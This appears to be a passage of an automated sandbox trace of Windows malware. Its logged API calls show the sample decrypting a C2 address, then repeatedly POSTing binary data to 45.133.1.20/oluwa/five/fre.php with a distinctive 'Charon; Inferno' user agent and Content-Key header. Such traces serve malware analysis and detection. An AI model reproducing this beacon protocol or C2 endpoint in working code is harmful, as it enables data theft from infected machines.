(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0214.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.615] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0214.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.620] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0214.620] GetProcessHeap () returned 0x6a0000 [0214.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0214.620] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0214.620] GetProcessHeap () returned 0x6a0000 [0214.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0214.621] GetProcessHeap () returned 0x6a0000 [0214.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0214.621] GetProcessHeap () returned 0x6a0000 [0214.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0214.621] GetProcessHeap () returned 0x6a0000 [0214.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0214.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.622] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.627] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0214.633] GetProcessHeap () returned 0x6a0000 [0214.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0214.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.634] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0214.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.635] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.636] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.636] GetProcessHeap () returned 0x6a0000 [0214.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0214.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.637] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0214.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.638] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0214.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.639] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0214.639] GetProcessHeap () returned 0x6a0000 [0214.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0214.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.641] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0214.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.642] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0214.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.643] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0214.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.644] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0214.644] GetProcessHeap () returned 0x6a0000 [0214.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0214.644] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0214.644] GetProcessHeap () returned 0x6a0000 [0214.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0214.644] socket (af=2, type=1, protocol=6) returned 0x608 [0214.645] connect (s=0x608, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0214.673] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0214.673] GetProcessHeap () returned 0x6a0000 [0214.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0214.673] GetProcessHeap () returned 0x6a0000 [0214.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4f18 [0214.674] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0214.675] wvsprintfA (in: param_1=0x6c4f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0214.675] GetProcessHeap () returned 0x6a0000 [0214.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0214.675] GetProcessHeap () returned 0x6a0000 [0214.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0214.676] GetProcessHeap () returned 0x6a0000 [0214.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0214.676] GetProcessHeap () returned 0x6a0000 [0214.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4f18 [0214.676] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0214.677] wvsprintfA (in: param_1=0x6c4f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0214.677] GetProcessHeap () returned 0x6a0000 [0214.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0214.677] GetProcessHeap () returned 0x6a0000 [0214.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0214.678] send (s=0x608, buf=0x6b5c98*, len=242, flags=0) returned 242 [0214.678] send (s=0x608, buf=0x6bb998*, len=159, flags=0) returned 159 [0214.678] GetProcessHeap () returned 0x6a0000 [0214.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0214.678] recv (in: s=0x608, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0214.750] GetProcessHeap () returned 0x6a0000 [0214.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0214.750] GetProcessHeap () returned 0x6a0000 [0214.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0214.751] GetProcessHeap () returned 0x6a0000 [0214.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0214.751] GetProcessHeap () returned 0x6a0000 [0214.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0214.751] closesocket (s=0x608) returned 0 [0214.752] GetProcessHeap () returned 0x6a0000 [0214.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0214.752] GetProcessHeap () returned 0x6a0000 [0214.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0214.752] GetProcessHeap () returned 0x6a0000 [0214.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0214.753] GetProcessHeap () returned 0x6a0000 [0214.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0214.753] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x670) returned 0x608 [0214.755] Sleep (dwMilliseconds=0xea60) [0214.759] GetProcessHeap () returned 0x6a0000 [0214.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0214.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.760] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.766] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0214.772] GetProcessHeap () returned 0x6a0000 [0214.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c61f0 [0214.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.773] CryptImportKey (in: hProv=0x6beb90, pbData=0x6c61f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0214.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.774] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.775] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.775] GetProcessHeap () returned 0x6a0000 [0214.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c61f0 | out: hHeap=0x6a0000) returned 1 [0214.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.777] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0214.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.780] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0214.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.781] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0214.781] GetProcessHeap () returned 0x6a0000 [0214.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0214.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.782] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0214.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.783] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0214.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.784] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0214.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.785] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0214.785] GetProcessHeap () returned 0x6a0000 [0214.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0214.785] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0214.785] GetProcessHeap () returned 0x6a0000 [0214.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0214.786] GetProcessHeap () returned 0x6a0000 [0214.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0214.786] GetProcessHeap () returned 0x6a0000 [0214.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0214.787] GetProcessHeap () returned 0x6a0000 [0214.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0214.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.793] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0214.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.800] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0214.810] GetProcessHeap () returned 0x6a0000 [0214.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0214.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.812] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0214.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.813] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0214.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.814] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.814] GetProcessHeap () returned 0x6a0000 [0214.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0214.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.816] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0214.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.817] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0214.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0214.819] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0214.819] GetProcessHeap () returned 0x6a0000 [0214.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0214.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.820] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0214.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.821] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0214.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.825] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0214.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0214.826] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0214.826] GetProcessHeap () returned 0x6a0000 [0214.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0214.826] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0214.826] GetProcessHeap () returned 0x6a0000 [0214.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0214.826] socket (af=2, type=1, protocol=6) returned 0x60c [0214.827] connect (s=0x60c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0214.882] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0214.882] GetProcessHeap () returned 0x6a0000 [0214.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0214.882] GetProcessHeap () returned 0x6a0000 [0214.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0214.883] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0214.884] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0214.884] GetProcessHeap () returned 0x6a0000 [0214.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0214.884] GetProcessHeap () returned 0x6a0000 [0214.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0214.885] GetProcessHeap () returned 0x6a0000 [0214.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0214.885] GetProcessHeap () returned 0x6a0000 [0214.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0214.886] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0214.887] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0214.887] GetProcessHeap () returned 0x6a0000 [0214.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0214.887] GetProcessHeap () returned 0x6a0000 [0214.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0214.888] send (s=0x60c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0214.888] send (s=0x60c, buf=0x6bb998*, len=159, flags=0) returned 159 [0214.888] GetProcessHeap () returned 0x6a0000 [0214.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0214.888] recv (in: s=0x60c, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0214.992] GetProcessHeap () returned 0x6a0000 [0214.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0214.993] GetProcessHeap () returned 0x6a0000 [0214.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0214.994] GetProcessHeap () returned 0x6a0000 [0214.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0214.994] GetProcessHeap () returned 0x6a0000 [0214.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0214.995] closesocket (s=0x60c) returned 0 [0214.996] GetProcessHeap () returned 0x6a0000 [0214.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0214.996] GetProcessHeap () returned 0x6a0000 [0214.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0214.996] GetProcessHeap () returned 0x6a0000 [0214.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0214.997] GetProcessHeap () returned 0x6a0000 [0214.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0214.998] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x668) returned 0x60c [0215.003] Sleep (dwMilliseconds=0xea60) [0215.004] GetProcessHeap () returned 0x6a0000 [0215.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0215.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.006] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.013] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0215.023] GetProcessHeap () returned 0x6a0000 [0215.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0215.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.024] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0215.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.025] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.026] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.026] GetProcessHeap () returned 0x6a0000 [0215.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0215.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.028] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0215.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.029] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0215.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.030] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0215.030] GetProcessHeap () returned 0x6a0000 [0215.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0215.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.031] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0215.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.039] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0215.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.040] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0215.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.041] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0215.041] GetProcessHeap () returned 0x6a0000 [0215.041] RtlAllocateHeap (HeapHandle=0x6a0000, 